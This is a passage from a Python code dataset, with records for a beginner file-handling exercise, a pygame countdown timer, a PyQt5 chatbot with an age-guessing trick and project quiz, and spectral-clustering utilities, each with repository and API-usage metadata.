53, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 53, "usage_type": "name"}, {"api_name": "flask.request", "line_number": 54, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 55, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 55, "usage_type": "name"}, {"api_name": "flask.request.values", "line_number": 56, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 56, "usage_type": "name"}, {"api_name": "auth.start_verify", "line_number": 65, "usage_type": "call"}, {"api_name": "send_msg.send_message", "line_number": 119, "usage_type": "call"}, {"api_name": "send_msg.send_message", "line_number": 141, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 146, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 149, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 149, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 159, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 166, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 170, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 170, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 171, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 172, "usage_type": "call"}, {"api_name": 
"flask.request.form", "line_number": 177, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 177, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 178, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 178, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 179, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 179, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 180, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 180, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 181, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 181, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 182, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 182, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 183, "usage_type": "name"}, {"api_name": "cv2.FaceDetectorYN.create", "line_number": 192, "usage_type": "call"}, {"api_name": "cv2.FaceDetectorYN", "line_number": 192, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 200, "usage_type": "call"}, {"api_name": "tensorflow.keras.models", "line_number": 200, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 200, "usage_type": "name"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 201, "usage_type": "call"}, {"api_name": "tensorflow.keras.models", "line_number": 201, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 201, "usage_type": "name"}, {"api_name": "flask.request", "line_number": 206, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 217, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 217, "usage_type": "name"}, {"api_name": "numpy.fromstring", "line_number": 219, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 219, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 219, "usage_type": "attribute"}, {"api_name": "cv2.imdecode", "line_number": 220, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 220, "usage_type": "attribute"}, {"api_name": "cv2.flip", "line_number": 221, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 232, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 236, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 236, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 240, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 240, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 242, "usage_type": "call"}, {"api_name": "cv2.imencode", "line_number": 245, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 249, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 257, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 268, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 278, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 278, "usage_type": "name"}, {"api_name": "flask.request.values", "line_number": 283, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 283, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 286, "usage_type": "call"}, {"api_name": "flask.request.values", 
"line_number": 286, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 286, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 287, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 292, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 292, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 292, "usage_type": "name"}, {"api_name": "auth.check_verify", "line_number": 295, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 318, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 318, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 322, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 322, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 327, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 351, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 384, "usage_type": "call"}]} +{"seq_id": "16892055259", "text": "import os\nfrom pathlib import Path\n\n\ndef my_function():\n try:\n my_list = [6, 0, 3, 2]\n print(my_list[2])\n print(my_list[0] / my_list[3])\n raise KeyError\n except (IndexError, KeyError) as err:\n print(f\"Check your index! Details: {err.args}\")\n except:\n print(\"Something bad happened\")\n finally:\n print(\"This will be always executed\")\n\n\nmy_function()\n\ntext_file = open(\"file.txt\", \"w\")\ntext_file.write(\"This is a message\\n\")\nprint(text_file.tell())\ntext_file.write(\"This is another message\")\ntext_file.close()\n\nwith open(\"file.txt\", \"r\") as another_text_file:\n another_text_file.seek(9)\n message = another_text_file.read()\n print(message)\n\nprint(another_text_file.closed)\nprint(another_text_file.mode)\n\nos.rename(\"file.txt\", \"new_file.txt\")\ncurrent_path = Path(\"new_file.txt\")\nprint(current_path.exists())\nprint(current_path)\n", "repo_name": "BogdanIancu/PythonForBeginners", "sub_path": "Course10/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 893, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.rename", "line_number": 35, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "5213770139", "text": "import pygame\n\nBLANCO = \"White\"\nNEGRO = \"Black\"\n\nclass Chronometer:\n def __init__(self, tiempo_inicial) -> None:\n self.tiempo_desendente = tiempo_inicial\n self.minutos = 0\n self.fuente = pygame.font.SysFont(\"Forte\", 40)\n self.tiempo_actual = pygame.time.get_ticks()\n self.detenido = False\n self.color = BLANCO\n\n def actualizar(self):\n if self.detenido == False:\n tiempo_transcurrido = pygame.time.get_ticks() - self.tiempo_actual\n if tiempo_transcurrido >= 1000:\n self.tiempo_actual = pygame.time.get_ticks()\n self.tiempo_desendente -= 1 # Resta 1 segundo en lugar de sumar 1\n\n\n def mostrar_tiempo(self, pantalla):\n cronometro = self.fuente.render(f\"0{self.minutos} : {str(self.tiempo_desendente).zfill(2)}\", False, self.color)\n pantalla.blit(cronometro, (870, 6))\n\n def get_tiempo(self)-> int:\n return self.tiempo_desendente\n", "repo_name": "alexisaranda1/alexis_aranda_pygame_2023", "sub_path": "Platform shooter/class_chronometer.py", "file_name": "class_chronometer.py", "file_ext": "py", "file_size_in_byte": 961, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 1, "dataset": 
"github-code", "pt": "52", "api": [{"api_name": "pygame.font.SysFont", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.time.get_ticks", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.time.get_ticks", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.time.get_ticks", "line_number": 19, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 19, "usage_type": "attribute"}]} +{"seq_id": "830003478", "text": "import random\n\nimport function\nfrom function import *\nimport sys, time\nfrom PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QTextEdit, QPushButton, QLabel, QSizePolicy, QScrollArea\nfrom PyQt5.QtGui import QPixmap, QPalette, QBrush\nfrom PyQt5.QtCore import Qt, QTimer\ni = 0\nanswer = 'azerty'\nclass ChatBot(QWidget):\n def __init__(self):\n super().__init__()\n # self.i = 0\n self.initUI()\n self.connectSignals()\n\n def initUI(self):\n self.setWindowTitle('ChatBot')\n self.setFixedSize(600, 1000)\n\n self.setAutoFillBackground(True)\n palette = self.palette()\n background_image = QPixmap(\"funny.jpg\")\n palette.setBrush(QPalette.Window,\n QBrush(background_image.scaled(self.size(), Qt.IgnoreAspectRatio, Qt.SmoothTransformation)))\n self.setPalette(palette)\n self.setStyleSheet(\"border-radius: 20px;\")\n\n \"\"\"\n # positionne ma fenêtre au coin supérieur gauche\n screen_geometry = QApplication.desktop().availableGeometry()\n self.move(screen_geometry.x(), screen_geometry.y())\n \"\"\"\n\n # positionne ma fenêtre au coin supérieur droit\n screen_geometry = QApplication.desktop().availableGeometry()\n self.move(screen_geometry.width() - self.width(), 0)\n\n self.scroll_area = QScrollArea()\n self.scroll_area.setWidgetResizable(True)\n self.scroll_area.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n\n self.message_widget = QWidget()\n self.message_area = QVBoxLayout(self.message_widget)\n self.message_area.setAlignment(Qt.AlignTop)\n self.message_area.setSpacing(15)\n\n self.scroll_area.setWidget(self.message_widget)\n\n self.scroll_widget = QWidget()\n self.scroll_widget.setStyleSheet(\"background-color: transparent;\")\n self.scroll_layout = QVBoxLayout(self.scroll_widget)\n self.scroll_layout.addWidget(self.scroll_area)\n\n\n # Ajoutez le contenu à la zone de message comme avant.\n self.user_message = QTextEdit()\n self.user_message.setStyleSheet(\n 'background-color: white; border-radius: 10px; font-family: Monotype Corsiva; font-size: 25px; padding-left: 10px')\n self.user_message.setFixedHeight(40)\n self.user_message.setPlaceholderText(\"Tapez votre message...\")\n self.user_message.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n self.user_message.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed)\n\n self.send_button = QPushButton('Okay')\n self.send_button.setStyleSheet(\n 'background-color: #0084ff; font-family: Monotype Corsiva; font-size: 20px; color: white; border-radius: 10px;')\n self.send_button.setFixedHeight(40)\n self.send_button.setFixedWidth(80)\n\n self.bottom_bar = QHBoxLayout()\n self.bottom_bar.addWidget(self.user_message)\n self.bottom_bar.addWidget(self.send_button)\n self.bottom_bar.setSpacing(10)\n self.bottom_bar.setContentsMargins(10, 10, 10, 10)\n self.bottom_bar.setAlignment(Qt.AlignBottom)\n\n self.main_layout = QVBoxLayout(self)\n 
self.main_layout.addWidget(self.scroll_widget)\n self.main_layout.addLayout(self.bottom_bar)\n self.greet()\n\n def scrollToBottom(self):\n scrollbar = self.scroll_area.verticalScrollBar()\n scrollbar.setValue(scrollbar.maximum())\n\n def greet(self):\n bot_response01 = 'Hello! My name is Apasize. I was created in April 2023.'\n QTimer.singleShot(1000, lambda: self.addMessage(bot_response01, False))\n bot_response02 = 'Please, remind me your name.'\n QTimer.singleShot(2000, lambda: self.addMessage(bot_response02, False))\n\n def remind_name(self, message):\n bot_response = 'What a great name you have, ' + message + '!'\n QTimer.singleShot(1500, lambda: self.addMessage(bot_response, False))\n bot_response01 = 'Let me guess your age.'\n QTimer.singleShot(3000, lambda: self.addMessage(bot_response01, False))\n bot_response02 = 'Enter remainders of dividing your age by 3, 5 and 7.'\n QTimer.singleShot(4000, lambda: self.addMessage(bot_response02, False))\n\n def guess_age_and_enjoy(self, message):\n remainders = message.split(',') # couper en fonction de l'espace la saisie de l'utilisateur\n #print(remainders)\n if(remainders and remainders[0] and remainders[1] and remainders[2]):\n rem3 = int(remainders[0])\n rem5 = int(remainders[1])\n rem7 = int(remainders[2])\n else:\n rem3 = 0\n rem5 = 0\n rem7 = 0\n age = (rem3 * 70 + rem5 * 21 + rem7 * 15) % 105\n\n bot_response = \"You are \" + str(age) + \" years old; that's a good time to start programming!\"\n QTimer.singleShot(1000, lambda: self.addMessage(bot_response, False))\n\n\n\n bot_message = \"Let's test your Projects knowledge.\"\n QTimer.singleShot(2000, lambda: self.addMessage(bot_message, False))\n # write your code here\n quiz = [\"What technologies and tools does the Find_Me project use ?\",\n \"What technologies and tools does the PlantVision use ?\",\n \"What technologies and tools does the StressZero use ?\",\n \"What technologies and tools does the PerfectWriting use ?\",\n \"What technologies and tools does the MyMonotoringCamera use ?\",\n \"What technologies and tools does the Otakumate use ?\",\n \"What technologies and tools does the HomeLinks use ?\"]\n\n response = {\n 'response00': ('Supervised Learning', 'Computer Vision', 'Internet Of Objects', 'Deep Learning', 'All above'),\n 'response01': ('Data Clustering', 'Supervised Learning', 'Computer Vision', 'MyFavoriteHero', 'Deep Learning'),\n 'response02': ('Computer Vision', 'Internet Of Objects', 'Deep Learning', 'Supervised Learning', 'Akaza_Dono'),\n 'response03': ('Supervised Learning', 'To be an otaku', 'Deep Learning', ' Kit ARDUINO', 'Computer Vision'),\n 'response04': ('Deep Learning', 'Supervised Learning', 'Internet Of Objects', 'Computer Vision', 'Eren Jäger'),\n 'response05': ('Python', 'Computer Vision', 'Internet Of Objects', 'Supervised Learning', 'Boobs and imagination'),\n 'response06': ('Internet Of Objects', 'Supervised Learning', 'All above', 'Data Clustering', 'Have a girl friend')\n\n }\n\n answers = {\n 'response00': ['1,3'],\n 'response01': ['2,3,5'],\n 'response02': ['1,3,4'],\n 'response03': ['1,3,5'],\n 'response04': ['1,2,4'],\n 'response05': ['1,4'],\n 'response06': ['3']\n\n }\n\n tmp = random.randint(0, 6)\n resp = str('response0' + str(tmp))\n bot_response01 = quiz[tmp] + '\\n' + '1. ' + response[resp][0] + '\\n' + '2. ' + response[resp][1] + '\\n' + '3. ' + \\\n response[resp][2] + '\\n' + '4. ' + response[resp][3] + '\\n' + '5. 
' + response[resp][4]\n        QTimer.singleShot(3000, lambda: self.addMessage(bot_response01, False))\n\n\n        global answer\n        answer = answers[resp][0]\n\n    def test(self, message):\n\n        if(message == answer):\n            bot_message01 = 'Congratulations!!!'\n            QTimer.singleShot(1000, lambda: self.addMessage(bot_message01, False))\n            bot_message02 = 'Now you have unlocked the level allowing you to use commands to control our IoT tool!'\n            QTimer.singleShot(1500, lambda: self.addMessage(bot_message02, False))\n            bot_message = 'How can I help you? Enter your command'\n            QTimer.singleShot(2000, lambda: self.addMessage(bot_message, False))\n        else:\n            bot_message01 = 'GAME OVER!!!'\n            QTimer.singleShot(1000, lambda: self.addMessage(bot_message01, False))\n            bot_message02 = 'You love anime too much! Baaaka!'\n            QTimer.singleShot(1500, lambda: self.addMessage(bot_message02, False))\n            bot_message03 = \"Don't even try anymore. you can't...\"\n            QTimer.singleShot(2000, lambda: self.addMessage(bot_message03, False))\n\n\n\n\n\n    def command(self, command):\n        # break the command down into words\n        command_words = command.split(\" \")\n\n        # call the function that works out exactly what the user wants\n        user_prompt = function.prompt(command_words)\n        #print(user_prompt)\n        bot_response = 'A few moments...'\n        QTimer.singleShot(500, lambda: self.addMessage(bot_response, False))\n        send_prompt(user_prompt)\n\n        action = user_prompt.split(' ')[0]\n        #print(action)\n        if action == \"temp\":\n            bot_message = 'Your results.\\n'+function.get_message().split('\\n')[0]\n            #print(bot_message)\n            QTimer.singleShot(1200, lambda: self.addMessage(bot_message, False))\n        if action ==\"hum\":\n            bot_message = 'Your results.\\n'+function.get_message().split('\\n')[0]\n            QTimer.singleShot(1200, lambda: self.addMessage(bot_message, False))\n\n    def addMessage(self, message, isUser):\n        message_label = QLabel(message)\n        message_label.setWordWrap(True)\n\n        message_label.setStyleSheet(\n            'background-color: #EDEDED; border-radius: 10px; padding: 5px; font-family: Monotype Corsiva; font-size: 20px;')\n\n        if isUser:\n            message_layout = QHBoxLayout()\n            message_layout.addWidget(QLabel())\n            message_layout.addWidget(message_label)\n        else:\n            message_layout = QHBoxLayout()\n            message_layout.addWidget(message_label)\n            message_layout.addWidget(QLabel())\n\n        message_layout.setContentsMargins(-10, 5, 10, 5)\n\n        self.message_area.addLayout(message_layout)\n        self.scroll_area.ensureWidgetVisible(self.message_widget)\n\n    def execute(self):\n        global i, answer\n        #print(i)\n        #print(self.send_button.isChecked())\n        command_list = ['name', 'age', 'test', 'command']\n        if command_list[i] == 'name':\n            message = self.sendUserMessage()\n            self.remind_name(message)\n            i += 1\n        elif command_list[i] == 'age':\n            message = self.sendUserMessage()\n            self.guess_age_and_enjoy(message)\n            i += 1\n        elif command_list[i] == 'test':\n            message = self.sendUserMessage()\n            self.test(message)\n            i += 1\n        elif command_list[i] == 'command':\n            commande = self.sendUserMessage()\n            self.command(commande)\n\n\n    def sendUserMessage(self):\n        message_text = self.user_message.toPlainText()\n        QTimer.singleShot(0, lambda: self.addMessage(message_text, True))\n        #print(message_text)\n\n        self.user_message.clear()\n\n        # Set focus back to the user message QTextEdit\n        self.user_message.setFocus()\n        return message_text\n\n    def connectSignals(self):\n        self.setLayout(self.main_layout)\n        self.send_button.clicked.connect(self.execute)\n        #self.user_message.returnPressed.connect(self.execute)\n\n\nif __name__ == '__main__':\n    app = 
QApplication(sys.argv)\n chatbot = ChatBot()\n #chatbot.connectSignals()\n chatbot.show()\n sys.exit(app.exec_())\n\n\n\n\"\"\"\n def connectSignals(self):\n self.i += 1\n print(self.send_button.isChecked())\n command_list = ['greet', 'name', 'age', 'test', 'command']\n self.setLayout(self.main_layout)\n if command_list[self.i - 1] == 'greet':\n self.greet()\n print(self.send_button.isChecked())\n\n elif self.send_button.isChecked():\n print(self.send_button.isChecked())\n #if command_list[self.i - 1] == 'name':\n self.sendUserMessage()\n self.remind_name()\n elif command_list[self.i - 1] == 'age':\n if self.send_button.isChecked():\n self.guess_age()\n elif command_list[self.i - 1] == 'test':\n if self.send_button.isChecked():\n self.test()\n elif command_list[self.i - 1] == 'command':\n if self.send_button.isChecked():\n self.command()\n print(self.send_button.isChecked())\n #self.send_button.clicked.connect(self.remind_name)\n \n\"\"\"", "repo_name": "Apasize/My_Pyqt_ChatBot", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 12376, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 11, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 24, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QPalette.Window", "line_number": 25, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui.QPalette", "line_number": 25, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QBrush", "line_number": 26, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.IgnoreAspectRatio", "line_number": 26, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 26, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.SmoothTransformation", "line_number": 26, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QApplication.desktop", "line_number": 37, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 37, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QScrollArea", "line_number": 40, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.ScrollBarAlwaysOff", "line_number": 42, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 42, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 44, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 45, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.AlignTop", "line_number": 46, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 46, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 51, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 53, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTextEdit", "line_number": 58, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.ScrollBarAlwaysOff", "line_number": 63, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 63, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QSizePolicy.Expanding", "line_number": 64, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QSizePolicy", "line_number": 64, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QSizePolicy.Fixed", "line_number": 64, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 66, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 72, "usage_type": "call"}, {"api_name": 
"PyQt5.QtCore.Qt.AlignBottom", "line_number": 77, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 77, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 79, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 90, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 90, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 92, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 92, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 96, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 96, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 98, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 98, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 100, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 100, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 116, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 116, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 121, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 121, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 153, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 157, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 157, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 167, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 167, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 169, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 169, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 171, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 171, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 174, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 174, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 176, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 176, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 178, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 178, "usage_type": "name"}, {"api_name": "function.prompt", "line_number": 189, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 192, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 192, "usage_type": "name"}, {"api_name": "function.get_message", "line_number": 198, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 200, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 200, "usage_type": "name"}, {"api_name": "function.get_message", "line_number": 202, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 203, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 203, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 206, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 
213, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 214, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 217, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 219, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 250, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 250, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 266, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 266, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 270, "usage_type": "call"}]} +{"seq_id": "72793968484", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport torch\nfrom scipy.sparse import csr_matrix\nfrom scipy.sparse import diags\nfrom scipy.sparse.linalg import eigsh\n\nfrom sklearn.cluster import KMeans\nfrom sklearn.neighbors import NearestNeighbors\n\nfrom typing import Tuple\nfrom typing import List\n\n\ndef rbf_neighbor_graph(\n X: np.ndarray,\n adaptive: bool = True,\n k: int = 30,\n a: int = 10,\n) -> csr_matrix:\n \"\"\"\n Construct a symmetric nearest neighbor graph with weights obtained \n using a Gaussian radial basis function (rbf) kernel.\n \n Arguments:\n X : np.ndarray of shape n_cells by n_features to obtain pairwise\n distances from\n adaptive : bool specifying whether to use an adaptive or global width\n in the rbf kernel\n k : int specifying the number of neighbors to use in the graph\n a : int specifying how to set the width for the rbf. When adaptive is\n True this parameter sets the width to the distance to the ath\n nearest neighbor. When adaptive is False the width is set to the \n ath percentile of nearest neighbor distances.\n \n Returns: \n 0.5 * (G + G.T) : The symmetric adjacency graph stored as a csr_matrix\n \n \"\"\"\n \n kNN = NearestNeighbors(n_neighbors = k, metric=\"minkowski\", p = 2)\n kNN.fit(X)\n G = kNN.kneighbors_graph(mode = \"distance\")\n \n if(adaptive):\n sigma = np.zeros(X.shape[0])\n for i in range(X.shape[0]):\n sigma[i] = np.sort(G.getrow(i).data)[a - 1]\n indptr = G.indptr\n for i in range(X.shape[0]):\n G.data[indptr[i]: indptr[i + 1]] = np.exp( - (G.data[indptr[i]: indptr[i + 1]] / sigma[i]) ** 2)\n \n else:\n sigma = np.percentile(G.data, a)\n G.data = np.exp(- (G.data / sigma) ** 2)\n \n return 0.5 * (G + G.T)\n \n \ndef reorder_clusters(\n cl: np.array\n) -> np.array:\n \"\"\"\n Reorder cluster labels by size\n \n Arguments:\n cl : Numpy array containing cluster labels for each cell\n \n Returns:\n cl_reorder : Integer cluster labels for the cells ordered\n by decreasing cluster size\n \n \"\"\"\n \n clust_size = {}\n clust_size = {c:0 for c in np.unique(cl)}\n for label in cl:\n clust_size[label] += 1\n \n clust_sort = sorted(clust_size.items(), key = lambda x: x[1], reverse = True) \n conversion_dict = {label[0]: i for i, label in enumerate(clust_sort)}\n \n cl_reorder = cl.copy()\n for i, label in enumerate(cl):\n cl_reorder[i] = conversion_dict[label]\n \n return cl_reorder\n\n\ndef sparse_spectral(\n A: csr_matrix,\n n_clust: int,\n random_state: int = 12345678,\n) -> Tuple[csr_matrix, np.ndarray, np.ndarray]:\n \"\"\"\n Spectral decomposition for a sparse adjacency matrix A.\n \n Arguments:\n A : The sparse adjacency matrix\n n_clust : the number of eigenvalues and corresponding eigenvectors\n to return\n \n Returns:\n L : The symmetric graph Laplacian\n eig_vals : The first n_clust eigenvalues of the 
symmetric graph \n Laplacian\n eig_vecs : The first n_clust eigenvectors of the symmetric graph \n Laplacian\n \n \"\"\"\n v0 = np.random.default_rng(random_state).uniform(-1, 1, size = A.shape[0])\n \n D = diags(np.array(A.sum(axis=1))[:,0]).tocsr()\n D1_2 = D.sqrt().power(-1)\n \n L = D1_2 * (D - A) * D1_2\n \n eig_vals, eig_vecs = eigsh(L, k=n_clust, which=\"SM\", v0 = v0)\n \n return L, eig_vals, eig_vecs\n\n\ndef spectral_clustering(\n eig_vecs: np.ndarray,\n n_clust: int,\n random_state: int = 12345678,\n) -> np.ndarray:\n \"\"\"\n Perform k-means clustering given an eigenvector embedding.\n \n Arguments:\n eig_vecs : The eigenvector embedding matrix. Each column gives an\n eigenvector sorted in ascending order by eigenvalue\n n_clust : The number of clusters to partition the data. This also \n specifies the number of eigenvectors to use for the embedding.\n random_state : A random state to use for initializing the k-means\n search\n \n Returns:\n cluster_labels : The cluster labels for each cell. Each cluster is \n assigned an integer label and these labels are sorted in descending\n order by cluster size\n \n \"\"\"\n \n vecs_norm = eig_vecs[:, :n_clust] / np.linalg.norm(eig_vecs[:, :n_clust], axis = 1, keepdims = True)\n \n cluster_labels = KMeans(n_clusters = n_clust,\n max_iter = 1000,\n n_init = 100,\n random_state = random_state).fit_predict(vecs_norm)\n \n return 